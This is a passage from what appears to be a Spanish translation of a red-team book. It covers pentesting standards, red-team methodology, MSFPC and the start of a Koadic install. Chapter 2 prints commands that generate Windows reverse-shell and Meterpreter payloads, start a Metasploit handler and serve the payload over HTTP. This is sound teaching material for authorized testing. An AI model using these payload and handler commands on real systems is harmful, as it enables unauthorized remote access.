Tácticas prácticas del equipo rojo

Características clave
• Apunte a un entorno empresarial complejo en una actividad del Equipo Rojo
• Detecta amenazas y responde a ellas con una simulación de ciberataques del mundo real
• Explore herramientas y técnicas avanzadas de pruebas de penetración

Lo que vas a aprender

• Comienza con los compromisos del equipo rojo con métodos menos conocidos
• Explore niveles intermedios y avanzados de técnicas de post-explotación.
• Conozca todas las herramientas y marcos incluidos en el marco Metasploit
• Descubra el arte de obtener acceso sigiloso a los sistemas a través de Red Teaming
• Comprenda el concepto de redireccionadores para agregar más anonimato a su C2
• Conozca diferentes técnicas poco comunes para la exfiltración de datos

Acerca de
Red Teaming se utiliza para mejorar la seguridad mediante la realización de ataques simulados en una
organización para detectar vulnerabilidades de red y sistema. Las tácticas prácticas del equipo rojo
comienzan con una descripción general de pentesting y red teaming, antes de darle una introducción a
algunas de las últimas herramientas de pentesting. Luego pasaremos a explorar Metasploit y a
familiarizarnos con Armitage. Una vez que haya estudiado los fundamentos, aprenderá cómo usar Cobalt
Strike y cómo configurar su servidor de equipo.
El libro presenta algunas técnicas comunes menos conocidas para pivotar y cómo pivotar sobre SSH,
antes de usar Cobalt Strike para pivotar. Esta guía completa muestra métodos avanzados de post-
explotación utilizando Cobalt Strike y le presenta a los servidores y redirectores de Comando y Control
(C2). Todo esto lo ayudará a lograr la persistencia utilizando balizas y exfiltración de datos, y también le
dará la oportunidad de ejecutar la metodología para usar herramientas de actividad del Equipo Rojo
como Empire durante una actividad del Equipo Rojo en Active Directory y el Controlador de Dominio.
Además de esto, explorará el mantenimiento del acceso persistente, la imposibilidad de rastreo y la
obtención de conexiones inversas a través de diferentes canales encubiertos C2.
Al final de este libro, habrá aprendido sobre herramientas avanzadas de prueba de penetración, técnicas
para obtener capas inversas a través de canales encriptados y procesos para la post-explotación.

Capítulo 1. Red-Teaming y Pentesting

Pentesting es un ataque a un sistema informático, realizado para evaluar la seguridad del
sistema / red. Esta prueba se realiza para identificar vulnerabilidades y los riesgos que
poseen.
La década de 1960 marcó el verdadero comienzo de la era de la seguridad informática. En
este capítulo, cubriremos la metodología de pentesting que se usa ampliamente, así como el
enfoque de red-teaming, que ahora se está adoptando en diferentes corporaciones.
En este capítulo, cubriremos los siguientes temas:
 •Pentesting 101
•Un enfoque diferente

Pentesting 101
Como nosotrosTodos sabemos, las pruebas de penetración siguen un estándar. Existen
varios estándares, como el Proyecto de seguridad de aplicaciones web abiertas ( OWASP ),
el Manual de metodología de pruebas de seguridad de código abierto ( OSSTMM ),
el Marco de evaluación de seguridad de sistemas de información ( ISSAF ), etc. La mayoría
de ellos siguen la misma metodología, pero las fases han sido nombradas de manera
diferente. Echaremos un vistazo a cada uno de ellos en las siguientes secciones y
cubriremos los Estándares de Ejecución de Pruebas de Penetración ( PTES ) en detalle.

OWASP
OWASP es un  mundialcaridad sin fines de lucro organización que se enfoca en mejorar la
seguridad del software.
Es una comunidad de profesionales afines que publican software y documentación basada
en el conocimiento sobre seguridad de aplicaciones, que cubre temas como:
Recopilación de información
•Configuración y pruebas de gestión de despliegue
•Prueba de gestión de identidad
•Pruebas de autenticación
•Prueba de autorización
•Prueba de manejo de sesión
•Prueba de validación de entrada
•Manejo de errores
•Criptografía
•Prueba de lógica de negocios
•Pruebas del lado del cliente

Manual de metodología de pruebas de seguridad de

código abierto (OSSTMM)
Como se menciona en susitio web oficial, este es un manual revisado por paresde pruebas y
análisis de seguridad, proporcionando hechos verificados. Estos hechos proporcionan
información procesable que puede mejorar de manera considerable su seguridad operativa.

El OSSTMM incluye las siguientes secciones clave:

Métricas de seguridad operacional
 •Análisis de confianza
•Flujo de trabajo
•Pruebas de seguridad humana
•Pruebas de seguridad física
•Prueba de seguridad inalámbrica
•Pruebas de seguridad de telecomunicaciones
•Pruebas de seguridad de redes de datos
•Regulaciones de cumplimiento
•Reportando conel informe de auditoría Prueba de Seguridad ( ESTRELLA )

Marco de evaluación de seguridad de sistemas de

información (ISSAF)
ISSAF no es muy activo, pero la guía que tienesiempre es bastanteexhaustivo. Su objetivo
es evaluar la política y el proceso de seguridad de la información de una organización con
respecto al cumplimiento de los estándares de la industria de TI, junto con las leyes y los
requisitos reglamentarios. La versión actual de ISSAF es 0.2.
Las etapas que cubrese puede encontrar
en  [Link]  .

Estándar de ejecución de pruebas de penetración

(PTES)
Este estándar es el más ampliamenteestándar usado y cubiertas Casi todo lo relacionado
con el pentesting.
PTES se divide en las siguientes siete fases:
Interacciones previas al compromiso
[Link] recogida de información
[Link] de amenazas
[Link]álisis de vulnerabilidad.
[Link]ón
[Link]-explotación
[Link]

Veamos brevemente en qué consiste cada una de estas fases.

Interacciones previas al compromiso

Estas acciones implican múltiples procesos que se llevarán a cabo antes de que comience una actividad,
como definir el alcance de la actividad, que generalmente implica mapear las IP de red, las aplicaciones
web, las redes inalámbricas, etc.
Una vez que se realiza el alcance, se establecen líneas de comunicación entre los proveedores y se
finaliza el proceso de notificación de incidentes. Estas interacciones también incluyen actualizaciones de
estado, llamadas, procesos legales y las fechas de inicio y finalización del proyecto.

La recogida de información
Este es un procesoque se usa para recopilar tanta información como sea posible sobre el objetivo. Esta es
la parte más crítica del pentesting, ya que mientras más información tengamos, más vectores de ataque
podemos planear para realizar la actividad. En caso de una actividad de caja blanca, toda esta
información ya se proporciona al equipo de prueba.

Modelado de amenazas
Modelado de amenazasEl modelo depende de la cantidad de información recopilada. Dependiendo de
eso, la actividad se puede dividir y luego realizar mediante herramientas automatizadas, ataques lógicos,
etc. El siguiente diagrama ilustra un ejemplo de un mapa mental de un modelo de amenaza:

Análisis de vulnerabilidad.
Este es un procesode descubrir defectos que pueden ser utilizados por un atacante. Estos defectos
pueden ser cualquier cosa, desde puertos abiertos / configuración incorrecta del servicio hasta una
inyección SQL. Hay muchas herramientas disponibles que pueden ayudar a realizar un análisis de
vulnerabilidad. 
Estos incluyen Nmap, Acunetix y Burp Suite. También podemos ver nuevas herramientas que se lanzan
cada pocas semanas.

Explotación
Este es un procesode obtener acceso al sistema evadiendo el mecanismo de protección en el sistema
basado en la evaluación de vulnerabilidad. Los exploits pueden ser públicos o un día cero.

Post-explotación
Este es un procesodonde el objetivo es determinar la importancia del compromiso y luego mantener el
acceso para uso futuro. Esta fase siempre debe seguir las reglas del compromiso que protege al cliente y
nos protege a nosotros mismos (cubriendo las pistas según los requisitos de la actividad).

Informes
Este es unode las fases más importantes, ya que el parcheo de todos los problemas depende totalmente
de los detalles presentados en el informe. El informe debe contener tres elementos clave:
• Crítica del error
• Pasos de reproducción del error
• Sugerencias de parches

En resumen, las fases del ciclo de vida más reciente se presentan en el siguiente diagrama:
Un enfoque diferente
Analicemos un enfoque diferente: la formación de equipos rojos. El principalEl objetivo del
red-teaming es evaluar y obtener el nivel real de riesgo que una empresa tiene en ese
momento. En esta actividad, las redes, las aplicaciones, las físicas y las personas (ingeniería
social) se prueban contra las debilidades.
La formación de equipos rojos también puede considerarse como una simulación de un
hack del mundo real.

Metodología
La formación de equipos rojos se basa en el estándar PTES como base. Sin embargo, hay muchomás que
eso. Se puede decir que la actividad de prueba de penetración se realiza con el objetivo de encontrar la
mayor cantidad de vulnerabilidades en la cantidad de tiempo posible. Sin embargo, la formación de
equipos rojos se realiza con un solo objetivo y siendo discreto.
La metodología utilizada en una actividad de equipo rojo implica lo siguiente:
• Reconocimiento
• Compromiso
• Persistencia
• Comando y control
• Escalada de privilegios
• Pivotante
• Informes y limpieza
El siguiente ciclo básicamente se repite para cada nueva información que se encuentre sobre el cliente
hasta que se cumpla el objetivo:
¿Como es diferente?
Miremos con una perspectiva diferente para obtener una imagen más clara:
Mirando el diagrama anterior, podemos ver que la formación de equipos rojos implica el uso
de todos los medios para lograr los objetivos. Podemos resumir la principal
diferencia entrered-teaming y pentesting como sigue:
• El trabajo en equipo rojo implica encontrar y explotar solo aquellas vulnerabilidades que ayudan a
lograr nuestro objetivo, mientras que el pentest consiste en encontrar y explotar vulnerabilidades en
el alcance dado, que se limita a los activos digitales
• Red-teaming tiene una metodología extremadamente flexible, mientras que pentesting tiene
métodos estáticos fijos
• Durante la formación de equipos rojos, los equipos de seguridad de las organizaciones no tienen
información al respecto, mientras que durante el pentesting, los equipos de seguridad son
notificados
• Los ataques de equipo rojo pueden ocurrir 24/7, mientras que las actividades de pentesting se
limitan principalmente al horario de oficina
• Red-teaming se trata más de medir el impacto comercial de las vulnerabilidades, mientras que
pentesting se trata de encontrar y explotar vulnerabilidades.

Resumen
Concluyendo el capítulo, aprendimos sobre los diferentes estándares de pentesting
seguidos en toda la industria, y pasamos por las siete fases del estándar PTES en
detalle. También observamos el trabajo en equipo rojo y cómo es diferente del pentesting.
En el próximo capítulo, veremos algunas de las últimas herramientas de post-explotación y
examinaremos en detalle cómo funcionan.

Preguntas
1. ¿Cuáles son los diferentes estándares de pentesting?
2. ¿Cuáles son las diferentes fases de PTES?
3. ¿Cuál es la diferencia entre red-teaming y pentesting?
4. ¿Cuáles son los elementos clave de un informe?
5. ¿Cuál es el objetivo principal de una actividad de equipo rojo?

Otras lecturas
Para obtener más información sobre los temas tratados en este capítulo, visite los
siguientes enlaces:
• Organización de alto nivel de la norma : [Link]
• OSSTMM : [Link]
• Prueba de penetración de aplicaciones
web : [Link]
• Marco de evaluación de seguridad de sistemas de información
(ISSAF) : [Link]
• Recursos de InfoSec : [Link]
testing/#gref
Capítulo 2. Pentesting 2018
En los últimos años, hemos estado utilizando herramientas tales como Metasploit
Framework, routersploit, [Link], nmap, y así sucesivamente para el post-explotación y
exploración. Con la creciente popularidad de las nuevas herramientas, sería bueno conocer
algunas herramientas nuevas que pueden usarse para la post-explotación. De las muchas
herramientas disponibles, analizaremos MSFvenom Payload Creator ( MSFPC ), un simple
generador de carga útil basado en MSF; y Koadic, un servidor de Comando y
Control ( C3 ) basado en COM , que se puede usar en operaciones de equipo rojo o
pruebas de penetración para después de la explotación.
En este capítulo, cubriremos las siguientes herramientas:
En este capítulo, cubriremos las siguientes herramientas:
• MSFPC
• Kaodic

Requerimientos técnicos
• * sistema basado en nix (Kali, Ubuntu o macOS X)
• El marco Metasploit (necesario para MSFPC)
• Paquete Python versión 2 o 3 (necesario para Koadic)

MSFvenom Payload Creator

MSFvenom Payload Creator (MSFPC) es un múltiple fácil de usar generador de carga útil
que se puede utilizar para generar cargas útiles de Metasploit en función de las opciones
seleccionadas por el usuario. El usuario ya no necesita ejecutar
los msfvenomcomandos largos  para generar cargas útiles. Con MSFPC, el usuario puede
generar las cargas útiles con muchos menos comandos.
Antes de descargar la herramienta, Metasploit debe instalarse en el sistema. MSFPC es solo
un script bash simple, lo que significa que puede ejecutarse en sistemas * nix.
 
Podemos descargar el MSFPCpaquete de [Link]
descargar el repositorio en un archivo ZIP o podemos clonar el repositorio en nuestro
sistema local ejecutando el siguiente comando:

git clone [Link]

cd mpc/
chmod +x [Link]
./[Link]
./[Link] <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>)
(<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)

TYPE: La carga útil podría ser de cualquierde los siguientes formatos (esta opción es la misma que la -fdel
interruptor en msfvenom): APK [android], ASP, ASPX, Bash [.sh], Java [.jsp], Linux [.elf], OSX [.macho], Perl
[.pl], PHP, Powershell [.ps1], Python [.py], Tomcat [.war], Windows [.exe //.dll].

•DOMAIN/IP: Esta es la LHOSTopción al generar cargas útiles en msfvenom.

•PORT: Esta es la LPORTopción al generar cargas útiles en msfvenom.
•CMD/MSF: Este es el tipo de shell que se cae una vez que la carga útil se ejecuta en el sistema de
destino. La CMDopción se puede utilizar cuando desea obtener un shell de comando estándar; es decir,
el shell del símbolo del sistema ( [Link]) para Windows y Terminal ( /bin/bash) para * nix. En algunos
casos, donde el tamaño del shellcode es importante, es mejor usar la clásica carga útil de shell
inverso. CMDse puede usar en situaciones como estas.

Se puede generar una carga útil clásica de shell inversa simple ejecutando el siguiente
 comando:

sh [Link] cmd windows en0

El comando anterior generará una carga útil con a cmdcomo el shell preferido para Windows
y establecerá LHOSTla IP recuperada de la en0interfaz Ethernet:

Como puede ver en la captura de pantalla anterior, MSFPC creó dos archivos en el mismo
directorio:
• La carga útil ejecutable :[Link]
• El archivo de recursos :[Link]
•
La convención de nomenclatura para los archivos es fácil de entender, ya que llevan el
nombre de las opciones utilizadas durante la creación. Acabamos de crear un ejecutable
de Windows (explicado más adelante en este capítulo) cuando se ejecuta en el servidor de
destino se conectará de nuevo a nuestro sistema ( conexión inversa ) en nuestro puerto
local 443 y nos enviará un shell de símbolo del sistema . Por lo tanto, windows-shell-
[Link]. 

Se prefiere tener un shell inverso en lugar de un shell de enlace (explicado en los siguientes
capítulos)

Archivo de recursos
Como se explica en
la documentaciónde Metasploit( [Link]
los scripts de recursos proporcionan una manera fácil de automatizar tareas repetitivas en
Metasploit. Conceptualmente, son como scripts por lotes. Contienen un conjunto de
comandos que se ejecutan automática y secuencialmente cuando carga el script en
Metasploit. Puede crear un script de recursos encadenando una serie de comandos de la
consola Metasploit e incrustando directamente Ruby para hacer cosas como llamar a las
API, interactuar con objetos en la base de datos e iterar acciones.

Veamos el .rcarchivo generado por MSFPC en el comando anterior:

La msfopción genera La carga útil con un shell multiplataforma personalizado que utiliza
todo el potencial de Metasploit:

#./[Link] msf windows en0

Si observa el .rcarchivo generado por MSFPC cuando msf se usa la opción, verá la diferencia

en la carga útil utilizada por el controlador de carga útil:

La carga útil se establece windows/meterpreter/reverse_tcpcuando MSFse

usa la opción. El recursoEl archivo se puede ejecutar con msfconsoleel siguiente comando:

Se ejecuta dentro del directorio msfpc

#./[Link] msf windows eth0
#service postgresql start
#mv [Link] [Link]
ejecutar :
#msfconsole -q -r '[Link]'
ejecutar :
#python -m SimpleHTTPServer 80
Koadic
Koadic es un kit de herramientas de post explotación de Windowscon una interfaz similar a
las otras herramientas famosas utilizadas para fines de pruebas de penetración, a saber,
Empire y Metasploit. Se llama C3 por una razón y es porque usa el Modelo de Objetos
Componentes ( COM ) en Windows y opera usandola utilidad de host de script (también
conocida como JScript / VBScript). Microsoft introdujo los objetos COM en 1993, lo que
también significa que las cargas útiles de Koadic son compatibles con las versiones
anteriores de Windows (NT / 95/2000) hasta la última versión, Windows 10. Koadic está
construido en Python y es compatible con Python 2 así como Python 3. Las cargas útiles
generadas por Koadic pueden ejecutarse completamente en memoria (desde la etapa 0
hasta la segunda etapa y más allá) y también admite la comunicación por etapas sobre SSL /
TLS, aunque depende de qué configuración esté habilitada en el sistema operativo víctima.

Instalación
Para la instalación, use el siguiente comando para clonar El repositorio de GitHub:
git clone [Link]